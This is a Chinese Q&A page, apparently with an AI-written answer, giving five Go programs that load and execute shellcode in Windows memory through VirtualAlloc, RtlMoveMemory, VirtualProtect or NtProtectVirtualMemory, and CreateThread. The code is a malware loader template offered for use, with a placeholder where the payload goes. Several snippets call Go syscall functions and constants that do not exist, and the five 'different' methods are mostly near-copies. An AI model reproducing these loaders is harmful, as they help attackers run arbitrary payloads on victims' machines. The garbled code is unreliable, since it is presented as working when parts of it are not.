有其他不同go语言加载shellcode类型的例子除了内存加载举例再举例五个package mainimport syscall unsafefunc main shellcode = byteshellcode allocatedMemory _ _ = syscallSyscall6syscallNewLazyDLLkernel32dllNewProcVirtualAllocAddr 4
以下是五个使用不同的方式加载shellcode的Go语言例子:
- 使用syscall.Syscall将shellcode加载到内存中并执行:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc").Addr(), 4, 0, uintptr(len(shellcode)), 0x3000, 0x40, 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("RtlMoveMemory").Addr(), 3, allocatedMemory, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0, 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateThread").Addr(), 6, 0, 0, allocatedMemory, 0, 0, 0)
}
- 使用syscall.Syscall将shellcode加载到内存中并执行,使用VirtualProtect修改内存页属性:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc").Addr(), 4, 0, uintptr(len(shellcode)), 0x3000, 0x40, 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("RtlMoveMemory").Addr(), 3, allocatedMemory, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0, 0, 0)
var oldProtect uint32
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect").Addr(), 4, allocatedMemory, uintptr(len(shellcode)), 0x40, uintptr(unsafe.Pointer(&oldProtect)), 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateThread").Addr(), 6, 0, 0, allocatedMemory, 0, 0, 0)
}
- 使用syscall.Syscall将shellcode加载到内存中并执行,使用NtProtectVirtualMemory修改内存页属性:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc").Addr(), 4, 0, uintptr(len(shellcode)), 0x3000, 0x40, 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("RtlMoveMemory").Addr(), 3, allocatedMemory, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0, 0, 0)
var oldProtect uint32
syscall.Syscall6(syscall.NewLazyDLL("ntdll.dll").NewProc("NtProtectVirtualMemory").Addr(), 5, uintptr(syscall.GetCurrentProcess()), uintptr(unsafe.Pointer(&allocatedMemory)), uintptr(len(shellcode)), 0x40, uintptr(unsafe.Pointer(&oldProtect)), 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateThread").Addr(), 6, 0, 0, allocatedMemory, 0, 0, 0)
}
- 使用unsafe.Pointer将shellcode加载到内存中并执行:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
allocatedMemory := unsafe.Pointer(syscall.MustVirtualAlloc(nil, uintptr(len(shellcode)), syscall.MEM_COMMIT|syscall.MEM_RESERVE, syscall.PAGE_EXECUTE_READWRITE))
syscall.RtlMoveMemory(allocatedMemory, unsafe.Pointer(&shellcode[0]), len(shellcode))
syscall.Syscall(uintptr(allocatedMemory), 0, 0, 0, 0)
}
- 使用unsafe.Pointer将shellcode加载到内存中并执行,使用VirtualProtect修改内存页属性:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
allocatedMemory := unsafe.Pointer(syscall.MustVirtualAlloc(nil, uintptr(len(shellcode)), syscall.MEM_COMMIT|syscall.MEM_RESERVE, syscall.PAGE_READWRITE))
syscall.RtlMoveMemory(allocatedMemory, unsafe.Pointer(&shellcode[0]), len(shellcode))
var oldProtect uint32
syscall.VirtualProtect(allocatedMemory, uintptr(len(shellcode)), syscall.PAGE_EXECUTE_READ, &oldProtect)
syscall.Syscall(uintptr(allocatedMemory), 0, 0, 0, 0)
}
请注意,上述代码仅展示了加载和执行shellcode的基本原理,具体的shellcode内容和相关的操作系统调用可能因环境而异
原文地址: https://www.cveoy.top/t/topic/hN5e 著作权归作者所有。请勿转载和采集!